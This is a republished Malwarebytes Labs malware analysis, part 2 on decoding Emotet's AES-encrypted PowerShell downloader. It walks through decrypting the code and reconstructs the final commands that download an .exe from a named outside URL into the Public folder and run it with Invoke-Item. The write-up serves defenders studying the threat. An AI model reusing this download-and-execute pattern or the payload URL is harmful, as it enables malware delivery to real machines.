{"id":12508,"date":"2018-06-07T08:10:04","date_gmt":"2018-06-07T16:10:04","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2018\/06\/07\/news-6277\/"},"modified":"2018-06-07T08:10:04","modified_gmt":"2018-06-07T16:10:04","slug":"news-6277","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2018\/06\/07\/news-6277\/","title":{"rendered":"Malware analysis: decoding Emotet, part 2"},"content":{"rendered":"<p><strong>Credit to Author: Vishal Thakur | Date: Thu, 07 Jun 2018 15:00:00 +0000<\/strong><\/p>\n<p>In part two of our series on decoding Emotet (you can catch up on <a href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/05\/malware-analysis-decoding-emotet-part-1\/\" target=\"_blank\" rel=\"noopener\">part 1 here<\/a>), we&#8217;ll cover analysis of the PowerShell code. Before we do that, however, it is a good idea to list some of the functions and calls that the code uses during execution.<\/p>\n<ul>\n<li>System.Runtime.InteropServices.Marshal: used for memory management<\/li>\n<li>SecureStringToBSTR: used to convert the SecureString to decrypted data<\/li>\n<li>ConvertTo-SecureString: used to convert the encrypted data into a SecureString<\/li>\n<\/ul>\n<h3>Encryption and PowerShell<\/h3>\n<p>There are a couple of ways to encrypt data using PowerShell. DPAPI (Data Protection Application Programming Interface) is one method of encrypting with PowerShell, but it&#8217;s not what our malware uses. The Emotet downloader uses AES to encrypt its data, so let&#8217;s take a look at how AES encryption works with PowerShell.<\/p>\n<p>If the data is encrypted using ConvertTo-SecureString but with NO key, PowerShell will by default use DPAPI. But it will then only work for the logged-in user on the machine it was encrypted on.<\/p>\n<p>If the data is encrypted using ConvertTo-SecureString with a key, PowerShell will use AES to encrypt the data, and it can be decrypted on any machine by anyone who has the encryption key. 
Emotet downloader uses AES for encrypting the code, with the key hardcoded in the malware itself.<\/p>\n<h3>Code execution flow<\/h3>\n<p>In order to get to the encrypted code, we need to first understand the flow of execution. Let\u2019s have a look at how the code is structured.<\/p>\n<h4>Code structure<\/h4>\n<p>[RuntIME.InteroPsERvICEs.marshAl]::([runtiME.IntErOpserViceS.marshal].GeTMEmbERS()[2].nAME).inVOKe([RUNtIme.intEropseRVICEs.MarShal]::SeCURestrINgtogLoBaLaLloCUnicOde(<\/p>\n<p>From the snippet above, we need to extract useful code and then re-construct the structure so that we can follow the execution-flow and decrypt the code.<\/p>\n<p>[System.Runtime.InteropServices.Marshal]::<br \/> PtrToStringAuto([System.Runtime.InteropServices.Marshal]::<br \/> SecureStringToGlobalAllocUnicode<\/p>\n<h4>Code analysis<\/h4>\n<p>Now that we have a usable code structure, we can move on to the next step.<\/p>\n<p>The code above is looking for an encrypted data string that can then be run through SecureString for decryption.<\/p>\n<p>We now have access to the encrypted data from the VBA.<\/p>\n<p>&#8216;76492d1116743f0423413b16050a5345MgB8ADYAYwB4AHAAdgAxAHEAdQAvAEkAVQBXADQANQBrAFUAWgBkAEIANwBTAGcAPQA9AHwAYgAyADUAOQAwADMAYgBkAGMAOAA1AGMANwA0ADgAZgBhADUAYQBhAGIAYgBkADcAMwA1ADgAYwA3ADIANwA1ADAAZAA4AGEAYQBiADEANwBkADIAMwA3ADMANABlAGUAOAAxADUAZQA3ADAAOAAxADMAZQAyADIAZQBlADUAOAAxADcAMQAxAGUAOAA4ADUAOQAzADcAMwBlADcAOABmADYAYwA5ADkANAA3ADMAMABhAGMAMwAzADIAMQAxADcAYwA2AGQAMgAxADAAZQAyADQAZgAyAGUAMQA\u2026&#8230;<\/p>\n<p>We will take that encrypted code and run it through ConvertTo-SecureString to start the decryption process.<\/p>\n<p>Since the data string is so long, it is a good idea to first save it as a file and then pass it to a variable in PowerShell.<\/p>\n<p>For the purpose of this analysis, we\u2019ll save it as encrypted_code.txt.<\/p>\n<p>Now, we\u2019ll pass it to a variable $vEncrypted:<\/p>\n<p><strong>$vEncrypted = 
[IO.File]::ReadAllText(&#8220;absolute_path\\encrypted_code.txt&#8221;)<\/strong><\/p>\n<p>There are different ways to achieve the same result; Get-Content can also be used.<\/p>\n<p>Next, we run it through ConvertTo-SecureString to convert the encrypted string into a SecureString:<\/p>\n<p><strong>$vDecrypted = ConvertTo-SecureString -String $vEncrypted -Key (key goes here)<\/strong><\/p>\n<p>NOTE: The malware authors would have previously used \u201cConvertFrom-SecureString\u201d with a key (now hard-coded into the malware code) to encrypt the data. We\u2019re simply reversing the process to recover the code.<\/p>\n<p>The last step is to marshal the SecureString through SecureStringToBSTR and PtrToStringAuto to get the decrypted code.<\/p>\n<p>We\u2019ll store the result in a variable to keep it clean and simple.<\/p>\n<p><strong>$vResult = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($vDecrypted))<\/strong><\/p>\n<p>Note that we have used SecureStringToBSTR instead of what the malware authors are using (SecureStringToGlobalAllocUnicode). SecureStringToBSTR copies the SecureString value into an unmanaged binary string (BSTR) recognized by COM; SecureStringToGlobalAllocUnicode would work just as well.<\/p>\n<p>That\u2019s it. 
$vResult should now hold the completely decrypted code with the payload URLs.<\/p>\n<h3>Step-by-step analysis<\/h3>\n<p>Now that we know the code flow, let\u2019s run it in PowerShell and put all the knowledge we have gained by analyzing the code to work.<\/p>\n<p>First of all, we\u2019ll pass the encrypted code to the variable $vEncrypted:<\/p>\n<p><img src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic1.png\" alt=\"\" \/><\/p>\n<p>As you can see below, the encrypted data has now 
been stored in our variable $vEncrypted:<\/p>\n<p><img src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic2.png\" alt=\"\" \/><\/p>\n<p>The next step is to convert the encrypted data into a SecureString by running it through the ConvertTo-SecureString cmdlet. We will use the key that we found hard-coded into the malware code. 
We will pass the output to the variable $vDecrypted:<\/p>\n<p><img src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic3.png\" alt=\"\" \/><\/p>\n<p>In the next step, we will confirm whether the conversion was successful. 
As we can see below, the conversion was successful:<\/p>\n<p><img src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic4.png\" alt=\"\" \/><\/p>\n<p>Now, the final step to decrypt the data is to marshal it through SecureStringToBSTR and pass the output to a variable, in this case $vResult:<\/p>\n<p><img src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic5.png\" alt=\"\" \/><\/p>\n<p>It\u2019s now time to print the output of the variable and look at the decrypted code!<\/p>\n<p><img src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic6.png\" alt=\"\" \/><\/p>\n<p>We will further execute the code to extract the payload URLs and print them to the console in a clean and readable way. As we can see in the code, the variable $ADCX holds the URLs. 
We will use the split function as shown in the decrypted code and pass the output to $ADCX.<\/p>\n<p><img src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic7.png\" alt=\"\" \/><\/p>\n<p>All we have to do now is print the value of $ADCX to the console and we get all the URLs in a list.<\/p>\n<p><img src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic8.png\" alt=\"\" \/><\/p>\n<p>We already have the network IOC. At this point, we can go home! 
But do we ever?<\/p>\n<h3>Reconstructing the command-line arguments<\/h3>\n<p>Let\u2019s reconstruct the full command-line arguments, mostly as a reward for completing the analysis!<\/p>\n<p>Here\u2019s our PowerShell code, structured and readable:<\/p>\n<p><img src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic9.png\" alt=\"\" \/><\/p>\n<p>And here\u2019s the same code, cleaned and beautified:<\/p>\n<p><img src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic10.png\" alt=\"\" \/><\/p>\n<p>Now, we will look at all the variables and analyze them one by one to reconstruct the complete command-line arguments.<\/p>\n<h4>$nsadasd<\/h4>\n<p>This variable is assigned the output of (new-object) random, which translates to System.Random.<\/p>\n<p>Later in the code, this variable will be used to generate a random value (between 10,000 and 282,133) to be used as the file name for the downloaded payload. 
We\u2019ll see that in action when we analyze $NSB.<\/p>\n<p><img src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic11.png\" alt=\"\" \/><\/p>\n<h4>$YYU<\/h4>\n<p>This variable is assigned the value \u201c(new-object) System.Net.WebClient,\u201d which will be used later with DownloadFile to download content from the specified URI on the Internet and save it as a local file. We can have a look at the value assigned to the variable in the image below. 
These are the attributes that will be used to start the download of the payload.<\/p>\n<p><img src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic12.png\" alt=\"\" \/><\/p>\n<h4>$NSB<\/h4>\n<p>As we saw earlier, this variable calls the previously declared variable \u201c$nsadasd\u201d in conjunction with \u201c.next\u201d, which turns the expression into the method call \u201cRandom.Next\u201d. This, in turn, returns a random number within the specified range (in this case, 10,000 \u2013 282,133). 
As you can see below, it returns a different value each time it is executed.<\/p>\n<p><img src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic13.png\" alt=\"\" \/><\/p>\n<h4>$SDC<\/h4>\n<p><strong>$SDC = $env:public + &#8216;\\&#8217; + $NSB + (&#8216;.exe&#8217;);<\/strong><\/p>\n<p>This variable puts together the absolute path for the payload, complete with the file name that is generated by the variable $NSB.<\/p>\n<p><img src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic14.png\" alt=\"\" \/><\/p>\n<p>We have already looked at the $ADCX variable and how to extract the URIs out of it. 
Now let\u2019s reconstruct the entire command-line argument that is passed to the system for the malware to successfully download the payload, save it to local file, and execute it.<\/p>\n<p>Here\u2019s the way the code is executed by the malware using variables we analyzed above:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"24093\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/attachment\/pic15\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic15.png\" data-orig-size=\"512,72\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"pic15\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic15-300x42.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic15.png\" class=\"aligncenter size-full wp-image-24093\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic15.png\" alt=\"\" width=\"512\" height=\"72\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic15.png 512w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic15-300x42.png 300w\" sizes=\"auto, (max-width: 512px) 100vw, 512px\" \/><\/p>\n<p>Let\u2019s clean up the code to make it more readable:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"24094\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/attachment\/pic16\/\" 
data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic16.png\" data-orig-size=\"550,108\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"pic16\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic16-300x59.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic16.png\" class=\"aligncenter size-full wp-image-24094\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic16.png\" alt=\"\" width=\"550\" height=\"108\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic16.png 550w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic16-300x59.png 300w\" sizes=\"auto, (max-width: 550px) 100vw, 550px\" \/><\/p>\n<p>Now that we know the value that these variables hold, let\u2019s reconstruct the final command-line arguments that will be passed to the system for execution:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"24095\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/attachment\/pic17\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic17.png\" data-orig-size=\"974,129\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"pic17\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic17-300x40.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic17-600x79.png\" class=\"aligncenter size-full wp-image-24095\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic17.png\" alt=\"\" width=\"974\" height=\"129\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic17.png 974w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic17-300x40.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic17-600x79.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/06\/pic17-965x129.png 965w\" sizes=\"auto, (max-width: 974px) 100vw, 974px\" \/><\/p>\n<p>This is what it comes down to in the end:<\/p>\n<p><strong>(New-Object) System.Net.WebClient.&#8221;DownloadFile&#8221;(http:\/\/lecap-services.fr\/wiB9s.&#8221;ToString&#8221;(), C:\\USers\\Public\\264415.exe);<\/strong><\/p>\n<p>The command we have above will initiate the download of the data from the specified URI and save it to a local file as \u201cC:\\USers\\Public\\264415.exe\u201d.<\/p>\n<p><strong>(&#8216;Invoke-Item&#8217;)(C:\\USers\\Public\\264415.exe);<\/strong><\/p>\n<p>And this final command will start the execution of the payload.<\/p>\n<h3>Emotet: a complex malware<\/h3>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/detections\/trojan-emotet\/\" target=\"_blank\" rel=\"noopener\">Emotet<\/a> is one of the most active threats seen in the 
wild, with campaigns serving this malware daily to potential victims across the globe. The level of code obfuscation and encryption used to hide the code is quite complex and well-executed. In fact, it is one of the most complex downloaders in circulation.<\/p>\n<p>That&#8217;s why we felt it was so important to help audiences understand Emotet in sufficient detail so that code variations or other changes in the future do not pose any major challenges to analysts trying to decode this malware. The more you know, the better and faster you are able to protect users from sophisticated malware attacks.<\/p>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/\">Malware analysis: decoding Emotet, part 2<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Vishal Thakur| Date: Thu, 07 Jun 2018 15:00:00 +0000<\/strong><\/p>\n<table cellpadding='10'>\n<tr>\n<td valign='top' align='center'><a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/' title='Malware analysis: decoding Emotet, part 2'><img src='https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/05\/shutterstock_248596792.jpg' border='0'  width='300px'  \/><\/a><\/td>\n<\/tr>\n<tr>\n<td valign='top' align='left'>In part two of our series on decoding Emotet, we analyze the PowerShell code flow and structure. 
We also reconstruct the command-line arguments\u2014for fun!<\/p>\n<p>Categories: <\/p>\n<ul class=\"post-categories\">\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/malware-threat-analysis\/\" rel=\"category tag\">Malware<\/a><\/li>\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/\" rel=\"category tag\">Threat analysis<\/a><\/li>\n<\/ul>\n<p>Tags: <a href=\"https:\/\/blog.malwarebytes.com\/tag\/code-analysis\/\" rel=\"tag\">code analysis<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/downloader\/\" rel=\"tag\">downloader<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/emotet\/\" rel=\"tag\">emotet<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/encryption\/\" rel=\"tag\">encryption<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/powershell\/\" rel=\"tag\">powershell<\/a><\/p>\n<table width='100%'>\n<tr>\n<td align=right>\n<p><b>(<a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/' title='Malware analysis: decoding Emotet, part 2'>Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/06\/malware-analysis-decoding-emotet-part-2\/\">Malware analysis: decoding Emotet, part 2<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes 
Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[16201,11382,15715,10439,3764,11191,10494],"class_list":["post-12508","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-code-analysis","tag-downloader","tag-emotet","tag-encryption","tag-malware","tag-powershell","tag-threat-analysis"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12508","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=12508"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12508\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=12508"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=12508"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=12508"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}